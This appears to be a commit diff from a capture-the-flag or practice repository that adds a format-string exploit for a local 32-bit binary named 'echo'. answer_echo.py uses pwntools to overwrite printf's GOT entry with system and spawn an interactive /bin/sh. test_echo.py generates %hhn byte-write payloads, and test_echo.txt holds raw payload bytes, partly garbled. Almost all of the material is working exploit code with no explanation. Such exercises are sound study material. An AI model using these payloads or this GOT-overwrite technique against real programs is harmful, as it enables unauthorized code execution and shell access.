Finished format-string/echo

format-string/echo/answer_echo.py

@@ -0,0 +1,19 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math
+context(arch = "i386",os = "linux", log_level = "debug")
+
+p = process('./echo')
+elf = ELF('./echo')
+
+printf_got = elf.got['printf']
+system_plt = elf.plt['system']
+
+payload = fmtstr_payload(7, {printf_got: system_plt})
+
+p.sendline(payload)
+p.sendline("/bin/sh")
+p.interactive()
+

format-string/echo/test_echo.py

@@ -0,0 +1,35 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math
+context(arch = "i386",os = "linux", log_level = "debug")
+
+def gen_write_byte_format_string_i386(byte_value, write_address, fmtstr_shift_position, padding='0'):
+    # Placing: Align4(Padding Characters(Output_Count = byte_value), Fmtstr), Write Address
+    first_padding = padding * byte_value
+    flag = True
+    align_part_align_length = int(math.ceil(float(byte_value) / 4) + 2)
+    fmt_str = "%%%d$hhn" % (fmtstr_shift_position + align_part_align_length)
+    result_1 = first_padding + fmt_str
+    result_1 += (align_part_align_length * 4 - len(result_1)) * padding
+    result = result_1 + p32(write_address)
+    return result
+
+with open("answer_echo.txt", "w") as f:
+    f.write(gen_write_byte_format_string_i386(1, 0xffffce0c, 7))
+    f.write("\n")
+    f.write(gen_write_byte_format_string_i386(2, 0xffffce0d, 7))
+    f.write("\n")
+    f.write(gen_write_byte_format_string_i386(3, 0xffffce0e, 7))
+    f.write("\n")
+    f.write(gen_write_byte_format_string_i386(4, 0xffffce0f, 7))
+    f.write("\n")
+    f.write("exit")
+    f.write("\n")
+
+
+#p = process('./echo')
+#elf = ELF('./echo')
+
+

format-string/echo/test_echo.txt

@@ -0,0 +1,5 @@
+0%10$hhn0000<0C><><EFBFBD>
+00%10$hhn000
+<EFBFBD><EFBFBD><EFBFBD>
+000%10$hhn00<0E><><EFBFBD>
+0000%10$hhn0<0F><><EFBFBD>